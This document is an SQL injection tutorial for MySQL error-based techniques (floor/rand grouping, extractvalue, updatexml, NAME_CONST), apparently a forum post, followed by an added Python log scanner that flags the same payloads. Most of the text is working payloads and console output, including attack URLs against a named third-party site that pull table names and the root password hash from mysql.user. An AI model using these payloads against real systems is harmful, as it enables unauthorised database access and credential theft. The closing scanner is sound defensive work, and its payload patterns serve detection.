1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

Example. First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the duplicate-entry error. To extract other data, replace version() with the expression to be queried. For example, to retrieve the administrator's username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error uplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error uplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injection via NAME_CONST

It's been a while since I've made an SQL injection tutorial, so I thought I should make a new one using the NAME_CONST method. There aren't many papers documenting this method, so it feels kind of good to be the one to write a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything older than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
| TEST          |
|---------------|
| 1             |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error uplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST when trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, it works here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error uplicate column name '1'

Now let's get the tables out this bitch...

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error uplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table...

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error uplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
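For the defending side, here is a Python access-log scanner, added as an editorial example and not part of the original post or the pasted tutorial, that URL-decodes each request target and flags the error-based primitives described in sections 1-3 above (floor()/rand() grouping, extractvalue, updatexml) and in the NAME_CONST tutorial. The signature names, regular expressions and log lines are constructed for illustration; the payload shapes they match are the ones quoted on this page.

```python
import re
from urllib.parse import unquote_plus

# Error-based primitives covered on this page, matched against the
# URL-decoded, lower-cased query string of each request.
ERROR_BASED_SIGNATURES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(.*?group\s+by", re.S),
    "extractvalue":       re.compile(r"extractvalue\s*\("),
    "updatexml":          re.compile(r"updatexml\s*\("),
    "name_const_join":    re.compile(r"name_const\s*\(.*name_const\s*\(", re.S),
    "schema_enum":        re.compile(r"information_schema\s*\.\s*(tables|columns)"),
}

# Request line of a combined-format access log; only the target is needed.
LOG_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')

def normalize_query(url):
    """Return the decoded, whitespace-collapsed, lower-cased query string."""
    query = url.split("?", 1)[1] if "?" in url else ""
    # Decode twice: a payload is often encoded by the client and again by a
    # proxy. unquote_plus also maps '+' (used throughout this page) to space.
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).lower()

def classify_request(url):
    """Return the sorted signature names that match one request target."""
    q = normalize_query(url)
    return sorted(n for n, rx in ERROR_BASED_SIGNATURES.items() if rx.search(q))

def scan_log(lines):
    """Yield (line_number, matched_signatures) for each flagged log line."""
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if m:
            hits = classify_request(m.group(1))
            if hits:
                yield n, hits

# Constructed sample log lines (not taken from the original page).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /content/detail.php?id=330&sid=19 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /content/detail.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 88',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /content/detail.php?id=1+and+1=(updatexml(1,concat(0x3a,(select+user())),1)) HTTP/1.1" 500 72',
]

if __name__ == "__main__":
    for line_no, hits in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(hits)}")
```

A 500 response paired with any of these matches is the server-side counterpart of the "Duplicate entry" and "XPATH syntax error" messages shown above, which is why the flagged lines are worth correlating with the application's error log.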